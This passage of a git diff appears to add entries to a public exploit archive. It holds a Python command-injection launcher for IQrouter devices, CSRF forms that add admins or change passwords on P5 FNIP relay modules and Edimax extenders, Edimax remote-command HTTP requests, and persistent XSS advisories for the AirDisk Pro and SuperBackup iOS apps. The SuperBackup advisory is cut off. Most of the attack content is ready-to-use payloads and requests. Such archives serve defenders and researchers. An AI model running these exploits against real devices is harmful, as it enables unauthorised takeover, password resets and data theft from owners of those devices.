+ "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
+ "RCE /diag_set_static_modem (gateway param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
+ "RCE /diag_set_device_name_and_sync (device_name param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
+ "RCE /diag_set_device_name (device_name param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
+ "RCE /diag_pppoe_update (wan_username param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
+ "RCE /diag_pppoe_update (wan_password param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
+ "RCE /diag_pppoe (wan_username param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
+ "RCE /diag_pppoe (wan_password param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
+ "RCE /diag_pppoa_update (wan_username param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
+ "RCE /diag_pppoa_update (wan_password param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
+ "RCE /diag_pppoa (wan_username param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
+ "RCE /diag_pppoa (wan_password param)"
+ ],
+ [
+ "/cgi-bin/luci/er/advanced_link?link='`{}`'",
+ "RCE /advanced_link (link param)"
+ ]
+
+]
+
+advanced_payloads = [
+ [
+ "/cgi-bin/luci/er/reboot_link?reboot=1",
+ "Reboot IQrouter (/reboot_link reboot param))"
+ ],
+ [
+ "/cgi-bin/luci/er/screen2?reboot=1",
+ "Reboot IQrouter (/screen2 reboot param))"
+ ],
+ [
+ "/cgi-bin/luci/er/index?reset_config=1",
+ "Reset IQrouter (/index reset_config param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen7?upgrade=1",
+ "Upgrade IQrouter (/screen7 upgrade param)"
+ ],
+ [
+ "/cgi-bin/luci/er/vlanTag?restart_network=1",
+ "Restart network (/vlanTag restart_network param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_iperf_cmd/start",
+ "Start iperf script (/diag_iperf_cmd/start)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_iperf_cmd/stop",
+ "Stop iperf script (/diag_iperf_cmd/stop)"
+ ],
+ [
+ "/cgi-bin/luci/er/get_syslog",
+ "Router setup info log (/get_syslog)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
+ "Change root password to c00lpasswd (can change in code)"
+ ],
+ [
+ "/cgi-bin/luci/er/reset_password/",
+ "Change root password to 'changeme' (static)"
+ ]
+]
+
+
+def print_payloads():
+ print('#' * 30)
+ print("Payloads list")
+ num = 1
+ print('######################### RCE without auth ########################')
+ for payload in rce_any:
+ print("{} - {}".format(num, payload[1]))
+ num += 1
+
+ print(
+ '############### RCE (router need to be in setup mode) ###############')
+ for payload in rce_setup:
+ print("{} - {}".format(num, payload[1]))
+ num += 1
+
+ print(
+ '######################### Advanced payloads #########################')
+ for payload in advanced_payloads:
+ print("{} - {}".format(num, payload[1]))
+ num += 1
+
+
+parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
+parser.add_argument('--host', help='Host', type=str)
+parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
+parser.add_argument('-n', '--num', help='Payload number',
+ default=0, type=int)
+parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
+ default="pwd", type=str)
+parser.add_argument('--protocol', help='Protocol (http/https)',
+ default="http", type=str)
+
+args = parser.parse_args()
+
+
+def main():
+ print("")
+ full_payload_list = rce_setup + rce_any + advanced_payloads
+ payloads_amount = len(full_payload_list)
+ try:
+ hostname = args.host
+ port = args.port
+ payload_num = int(args.num)
+ bash_cmd = args.cmd
+ protocol = args.protocol
+
+ if payload_num < 1 or payload_num > payloads_amount:
+ print("Error with payload number!")
+ raise IndexError
+ if port < 0 or port > 65535:
+ print("Error with port number")
+ raise IndexError
+ if protocol not in ['http', 'https']:
+ print("Error with protocol name")
+ raise IndexError
+
+ current_payload = full_payload_list[payload_num - 1]
+ print("Payload: {}".format(current_payload[1]))
+ print("Host: {}".format(hostname))
+ print("Port: {}".format(port))
+ print("Protocol: {}".format(protocol))
+ print("Command: {}".format(bash_cmd))
+
+ full_url = "{}://{}:{}{}".format(protocol, hostname, port,
+ current_payload[0].format(bash_cmd))
+ print("Built URL: {}".format(full_url))
+
+ r = requests.get(full_url)
+ print("Status code: {}".format(r.status_code))
+ return
+ except IndexError:
+ parser.print_help()
+ print_payloads()
+ exit(1)
+
+
+if __name__ == '__main__':
+ print(
+ "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
+ exit(main())
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48362.txt b/exploits/hardware/webapps/48362.txt
new file mode 100644
index 000000000..671415866
--- /dev/null
+++ b/exploits/hardware/webapps/48362.txt
@@ -0,0 +1,90 @@
+# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)
+# Google Dork:jizhicms
+# Date: 2020-04-18
+# Exploit Author: iej1ctk1g
+# Product web page: https://www.p5.hu
+# Affected version: 1.0.20, 1.0.11
+# CVE : N/A
+
+<!--
+
+
+P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting
+
+
+Vendor: P5
+Product web page: https://www.p5.hu
+Affected version: 1.0.20, 1.0.11
+
+Summary: The FNIP-8x16A is an eight channel relay module used for switching any
+type of load that doesn’t exceed the specifications. Via its built-in web site
+and TCP/IP communication, the outputs and inputs can be controlled and monitored
+from standard network capable devices such as computers, smartphones, web-tablets,
+etc. either locally or via the network. The module can be used independently or
+as part of a complex control system in residential and commercial installations.
+
+Desc: The controller suffers from CSRF and XSS vulnerabilities. The application
+allows users to perform certain actions via HTTP requests without performing any
+validity checks to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits a malicious web
+site. Input passed to several GET/POST parameters is not properly sanitised before
+being returned to the user. This can be exploited to execute arbitrary HTML and
+script code in a user's browser session in context of an affected site.
+
+Tested on: Linux
+ CGI
+
+
+Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2020-5564
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php
+
+
+29.01.2020
+
+-->
+
+
+<!-- CSRF add admin user -->
+<html>
+ <body>
+ <form action="http://192.168.1.17:83/user.cgi" method="POST">
+ <input type="hidden" name="uno" value="1" /> <!-- User number (user1) -->
+ <input type="hidden" name="un" value="testingus" /> <!-- Username -->
+ <input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer -->
+ <input type="hidden" name="enabled" value="1" />
+ <input type="hidden" name="pw" value="123456" />
+ <input type="hidden" name="pw2" value="123456" />
+ <input type="submit" value="Zubmit" />
+ </form>
+ </body>
+</html>
+
+<!-- CSRF change admin password -->
+<html>
+ <body>
+ <form action="http://192.168.1.17:83/user.cgi" method="POST">
+ <input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
+ <input type="hidden" name="pw" value="123456" />
+ <input type="hidden" name="pw2" value="123456" />
+ <input type="submit" value="Zubmit" />
+ </form>
+ </body>
+</html>
+
+<!-- XSS modify labels -->
+<html>
+ <body>
+ <form action="http://192.168.1.17:83/config.html" method="POST">
+ <input type="hidden" name="lab1" value="Channel1" />
+ <input type="hidden" name="lab2" value="Channel2" />
+ <input type="hidden" name="lab3" value="Channel3" />
+ <input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
+ <input type="hidden" name="lab12" value="etc." />
+ <input type="submit" value="Zubmit" />
+ </form>
+ </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48365.txt b/exploits/hardware/webapps/48365.txt
new file mode 100644
index 000000000..c8a33a664
--- /dev/null
+++ b/exploits/hardware/webapps/48365.txt
@@ -0,0 +1,94 @@
+# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password)
+# Date: 2020-04-21
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+-----------------------------
+Here step by step :
+
+ 1. I did Setup
+ 2. After setup try to access to *wlencrypt_wiz.asp* file
+ 3. After access to this file, I saw some information disclosure
+(Like *WiFi Password*)
+ 4. Here is the all leak here:
+
+-------------------------------
+
+<SCRIPT>
+var _DATE_="Mon Sep 24 19:38:17 CST 2012";
+var _VERSION_="1.13";
+var _MODEL_="EW7438RPN";
+var _MODE_="Edimax";
+var _PLATFORM_="RTL8196CS_1200";
+var _HW_LED_WPS_="4";
+var _HW_LED_POWER_="6";
+var _HW_LED_WIRELESS_="2";
+var _HW_BUTTON_RESET_="5";
+var _HW_BUTTON_WPS_="1";
+var _HW_BUTTON_SWITCH_="3";
+var _HW_LED_USB_="17";
+var _WIRELESS_IGMPSNOOP_="y";
+var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y";
+var _RDISC_="y";
+var _WPS_NO_BROADCAST_="y";
+var _UPNP_LIB_VERSION2_="y";
+var _WDS_UR_INFO_="y";
+var _RESERVE_ENCRYPTION_SETTING_="y";
+var _IGMP_PROXY_="y";
+var _IGMPSNOOP_="y";
+var _RFTYPE_="2T2R";
+var _MEMBUS_="16";
+var _MEMSIZE_="16";
+var _MEMTYPE_="SDRAM";
+var _FLASHTYPE_="SPI";
+var _REMOVE_RADIUS_SERVER_="y";
+var _AUTO_CHANNEL_DET_="y";
+var _CONTROL_SIDEBAND_="y";
+var _WIFI_11N_STANDARD_="y";
+var _SETTING_WIZARD_="y";
+var _CONFIG_FILE_NAME_="7438RPN";
+var _AP_WITH_DNS_="y";
+var _USE_DNRD_="y";
+var _WPS_MIX_="y";
+var _POWER_SAVING_="y";
+var _WEB_FILE_NAME_="7438RPN";
+var _PINCODE_BY_MAC_="y";
+var _UPNP_RESPONDER_="y";
+var _MDNS_RESPONDER_="y";
+var _NETBIOS_RESPONDER_="y";
+var _AP_WITH_DHCP_CLIENT_="y";
+var _LLTD_NODENAME_="y";
+var _DHCP_SWITCH_="y";
+var _CONNECT_TEST_="y";
+var _START_BOA_="y";
+var _WPS_Daemon_="y";
+
+var security = 1;
+apMode = 6;
+methodVal = 2;
+opMode = 0;
+apMachType = 1;
+
+var ssidTbl = new Array("PentesterTraining");
+var mirrorTbl = "";
+var secModeTbl = new Array("2");
+var enable1XTbl = new Array("0");
+var _1xMode = "0";
+var wepTbl = new Array("0");
+var keyTypeTbl = new Array("1");
+var wpaCipherTbl = new Array("2");
+var pskFormatTbl = new Array("0");
+var pskValueTbl = new Array("wifipass123.");
+var defaultKeyIdTbl=new Array("0");
+var rsIp= "";
+var rsPort= "1812";
+var rsPassword= "";
+
+
+--
+
+Besim ALTINOK
+
+*Security Engineer*
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48366.txt b/exploits/hardware/webapps/48366.txt
new file mode 100644
index 000000000..5c8644f07
--- /dev/null
+++ b/exploits/hardware/webapps/48366.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
+# Date: 2020-04-21
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+
+CSRF PoC - Mac Filtering
+----------------------------------------------------------------------------------------------------------
+<html>
+ <body>
+ <script>history.pushState('', '', '/')</script>
+ <form action="http://172.20.10.2/goform/formWlAc" method="POST">
+ <input type="hidden" name="wlanAcEnabled" value="ON" />
+ <input type="hidden" name="tiny_idx" value="0" />
+ <input type="hidden" name="mac" value="ccbbbbbbbbbb" />
+ <input type="hidden" name="comment" value="PentesterTraining" />
+ <input type="hidden" name="addFilterMac" value="Add" />
+ <input type="hidden" name="submit-url"
+value="/macfilter1_sub1.asp" />
+ <input type="hidden" name="wlanSSIDIndex" value="1" />
+ <input type="submit" value="Submit request" />
+ </form>
+ </body>
+</html>
+
+--
+
+Besim ALTINOK
+
+*Security Engineer*
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48377.txt b/exploits/hardware/webapps/48377.txt
new file mode 100644
index 000000000..6d6bf69e5
--- /dev/null
+++ b/exploits/hardware/webapps/48377.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution
+# Date: 2020-04-23
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+------
+
+NOTE: This device configurated with root permissions. So you can run the
+command as root
+
+Here is the detail(s) of the RCE(s)
+
+1- Content of the mp.asp file
+
+<form action="/goform/mp" method="POST" name="mp">
+ <input type="text" name="command" value=""> <input
+type="submit" value="GO">
+ <input type="hidden" name="getID" value="">
+ <input type="hidden" name="getID" value="">
+</form>
+
+RCE Detail:
+-------------------------------
+
+POST /goform/mp HTTP/1.1
+Host: 192.168.2.2
+User-Agent: Mozilla/5.0 *********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 25
+DNT: 1
+Authorization: Basic YWRtaW46MTIzNA==
+Connection: close
+Cookie: language=1
+Upgrade-Insecure-Requests: 1
+
+command=||busybox+ls&getID=
+
+-------------------------------
+
+2- Content of the syscmd.asp
+
+<form action=/goform/formSysCmd method=POST name="formSysCmd"><table
+border=0 width="500" cellspacing=0 cellpadding=0>
+<tr><font size=2>
+This page can be used to run target system command.</tr>
+<tr><hr size=1 noshade align=top></tr>
+<tr> <td>System Command: </td>
+ <td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td>
+ <td> <input type="submit" value="Apply" name="apply" onClick='return
+saveClick()'></td></form>
+
+
+RCE Detail:
+-------------------------------
+
+POST /goform/formSysCmd HTTP/1.1
+Host: 192.168.2.2
+User-Agent: Mozilla/5.0 *********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 11
+DNT: 1
+Authorization: Basic YWRtaW46MTIzNA==
+Connection: close
+Cookie: language=1
+Upgrade-Insecure-Requests: 1
+
+sysCmd="command to here"
\ No newline at end of file
diff --git a/exploits/ios/webapps/48321.txt b/exploits/ios/webapps/48321.txt
new file mode 100644
index 000000000..833bae26a
--- /dev/null
+++ b/exploits/ios/webapps/48321.txt
@@ -0,0 +1,417 @@
+# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: http://www.app2pro.com
+# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421
+# CVE: N/A
+
+Document Title:
+===============
+AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2203
+
+
+Release Date:
+=============
+2020-04-15
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2203
+
+
+Common Vulnerability Scoring System:
+====================================
+4.5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+File sharing with other iOS devices via Bluetooth or Wi-Fi connection
+with automatic search of nearest devices.
+Users can perform file operations on the application like: Copy, Move,
+Zip, Unzip, Rename, Delete, Email, and more.
+Easy to create file like: Text File, New folder, Playlist, Take
+Photo/Video, Import From Library, and Voice Record.
+AirDisk Pro allows you to store, view and manage files on your iPhone,
+iPad or iPod touch. You can connect to AirDisk
+Pro from any Mac or PC over the Wi-Fi network and transfer files by drag
+& drop files straight from the Finder or Windows
+Explorer. AirDisk Pro features document viewer, PDF reader, music
+player, image viewer, voice recorder, text editor, file
+manager and support most of the file operations: like delete, move,
+copy, email, share, zip, unzip and more.
+
+(Copy of the Homepage:
+https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
+(Copy of the Homepage: http://www.app2pro.com )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile
+application.
+
+
+Affected Product(s):
+====================
+Felix Yew
+Product: AirDisk Pro v5.5.3 (iOS)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-15: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+No authentication (guest)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent cross site scripting vulnerability has been
+discovered in the official SuperBackup v2.0.5 ios mobile application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise the mobile
+web-application from the application-side.
+
+The first vulnerability is located in the `createFolder` parameter of
+the `Create Folder` function. Attackers are able to name
+or rename paths via airdisk pro ui to malicious persistent script codes.
+Thus allows to execute the persistent injected script
+code on the front site of the path index listing in the content itself
+on each refresh. The request method to inject is POST
+and the attack vector is located on the application-side. Interaction to
+exploit is as well possible through the unauthenticated
+started ftp service on the local network.
+
+The second vulnerability is located in the `deleteFile` parameter of the
+`Delete` function. The output location with the popup
+that asks for permission to delete, allows to execute the script code.
+The injection point is the file parameter and the execution
+point occurs in the visible delete popup with the permission question.
+The request method to inject is POST and the attack vector
+is located on the application-side.
+
+The third web vulnerability is located in the `devicename` parameter
+that is displayed on the top next to the airdisk pro ui logo.
+Remote attackers are able to inject own malicious persistent script code
+by manipulation of the local apple devicename information.
+The injection point is the devicename information and the execution
+point occurs in the file sharing ui panel of the airdisk pro
+mobile web-application.
+
+Remote attackers are able to inject own script codes to the client-side
+requested vulnerable web-application parameters. The attack
+vector of the vulnerability is persistent and the request method to
+inject/execute is POST. The vulnerabilities are classic client-side
+cross site scripting vulnerabilities. Successful exploitation of the
+vulnerability results in session hijacking, persistent phishing
+attacks, persistent external redirects to malicious source and
+persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] AirDisk pro Wifi UI
+
+Vulnerable Parameter(s):
+[+] createFolder
+[+] deleteFile
+[+] devicename
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with wifi access with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+1. Create Folder
+
+PoC: Vulnerable Source
+<tbody>
+<form name="checkbox_form"></form>
+<tr><td class="e"><input type="checkbox" name="selection"
+value="test"></td><td class="i"><a href="test/"><img
+src="/webroot/fileicons/folder.png"
+width="20" height="20"></a></td><td class="n"><a
+href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td
+class="s"></td><td class="k">Folder</td>
+<td class="e"><span style="height:15px;
+width:15px;"> </span></td><td class="e"><a href="#" title="Rename
+file" onclick="modalPopup("test", 0, 0);">
+<img src="/webroot/webrename.png" width="15" height="15"></a></td><td
+class="e"><a href="#" title="Delete file"
+onclick="modalPopup("test", 2, 0);">
+<img src="/webroot/webdelete.png" width="15"
+height="15"></a></td></tr><tr class="c"><td class="e"><input
+type="checkbox" name="selection"
+value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a
+href="[MALICIOUS INJECTED SCRIPT
+CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">
+<img src="/webroot/fileicons/folder.png" width="20"
+height="20"></a></td><td class="n">
+<a href="[MALICIOUS INJECTED SCRIPT
+CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe
+src="evil.source"></a></td>
+<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td
+class="k">Folder</td><td class="e"><span style="height:15px;
+width:15px;"> </span></td><td class="e">
+<a href="#" title="Rename file"
+onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS
+INJECTED SCRIPT CODE!];, 0, 1);">
+<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
+class="e">
+<a href="#" title="Delete file"
+onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS
+INJECTED SCRIPT CODE!];, 2, 1);">
+<img src="/webroot/webdelete.png" width="15"
+height="15"/></a></td></tr><tr><td class="e"><input type="checkbox"
+name="selection" value="Help.webarchive" /></td>
+<td class="i"><a href="Help.webarchive"><img
+src="/webroot/fileicons/webarchive.png" width="20"
+height="20"></a></td><td class="n">
+<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec
+2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web
+Archive</td>
+<td class="e"><a href="#" title="Download file"
+onClick="downloadFile("Help.webarchive");"><img
+src="/webroot/webdownload.png"
+width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename
+file" onClick="modalPopup("Help.webarchive", 0, 2);">
+<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
+class="e"><a href="#" title="Delete file"
+onClick="modalPopup("Help.webarchive", 2, 2);"><img
+src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
+</form>
+</tbody>
+</table>
+</div>
+
+
+--- PoC Session logs [POST] ---
+http://localhost:80/
+Host: localhost:80
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+Origin: http://localhost:80
+Connection: keep-alive
+Referer: http://localhost:80/
+Upgrade-Insecure-Requests: 1
+createFolder=test>"<[MALICIOUS INJECTED SCRIPT
+CODE!]>&ID=0&submitButton=Create
+-
+POST: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 6257
+
+Note: Adding via ftp on mkdir or file is as well possible without
+authentication on default setup.
+
+
+
+2. Delete / Old Popup
+
+PoC: Vulnerable Source
+<div id="modal-content" class="simplemodal-data" style="display: block;">
+ <div id="modal-title"><h3>Delete File</h3></div>
+ <div id="modal-text"><a>Are you sure you want to delete this
+file?"test"</a></div>
+ <form name="input" action="" method="post">
+ <div id="modal-field"><input type="hidden" name="deleteFile"
+value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT
+CODE]"></div>
+ <input type="hidden" name="ID" id="ID" value="test">
+ <input type="submit" name="submitButton" id="submitButton" value="Delete">
+ </form>
+</div>
+
+
+--- PoC Session logs [POST] ---
+http://localhost:80/
+Host: localhost:80
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 55
+Origin: http://localhost:80
+Connection: keep-alive
+Referer: http://localhost:80/evil.source
+Upgrade-Insecure-Requests: 1
+deleteFile=New Folder&ID=New Folder&submitButton=Delete
+-
+POST: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 4699
+
+
+Note: Comes up when somebody tries to delete the malicious injected path.
+
+
+3. Devicename
+
+
+PoC: Vulnerable Source
+<div id="headerWraper">
+ <table border="0" cellspacing="0" cellpadding="0" width="100%">
+ <tr>
+ <td><a href="./"><img src="/webroot/webicon.png" id="headerImg"
+width="57" height="57"/></a></td>
+ <td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td>
+ </tr>
+ </table>
+</div>
+
+
+--- PoC Session logs [GET] ---
+http://localhost:80/
+Host: localhost:80
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 55
+Origin: http://localhost:80
+Connection: keep-alive
+Referer: http://localhost:80/evil.source
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 4612
+
+Note: Executes each time the wifi sharing ui service of airdisk pro is
+opened by the local or remote users.
+
+
+Solution - Fix & Patch:
+=======================
+1. Disallow special chars in the folder and filenames. Sanitize all
+inputs and filter all involved parameters to prevent application-side
+attacks.
+2. Parse the output location of the popup permission message content to
+prevent further executions after injects via post method.
+3. Sanitize the devicename displayed on top of the wifi user interaction
+by a secure parsing mechanism.
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerabilities
+in the application functions are estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/ios/webapps/48322.txt b/exploits/ios/webapps/48322.txt
new file mode 100644
index 000000000..afef029c9
--- /dev/null
+++ b/exploits/ios/webapps/48322.txt
@@ -0,0 +1,306 @@
+# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: http://dropouts.in/
+# Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
+# CVE: N/A
+
+Document Title:
+===============
+SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2202
+
+
+Release Date:
+=============
+2020-04-15
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2202
+
+
+Common Vulnerability Scoring System:
+====================================
+4.6
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Backup all your iPhone or iPad contacts in 1 tap and export them.
+Fastest way to restore contacts from PC or Mac.
+Export by mailing the backed up contacts file to yourself. Export
+contacts file to any other app on your device.
+Export all contacts directly to your PC / Mac over Wifi, no software
+needed! Restore any contacts directly from
+PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
+app now.
+
+(Copy of the Homepage:
+https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent cross site web vulnerabilities in the official SuperBackup
+v2.0.5 ios mobile application.
+
+
+Affected Product(s):
+====================
+Dropouts Technologies LLP
+Product: Super Backup v2.0.5
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-15: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Pre auth - no privileges
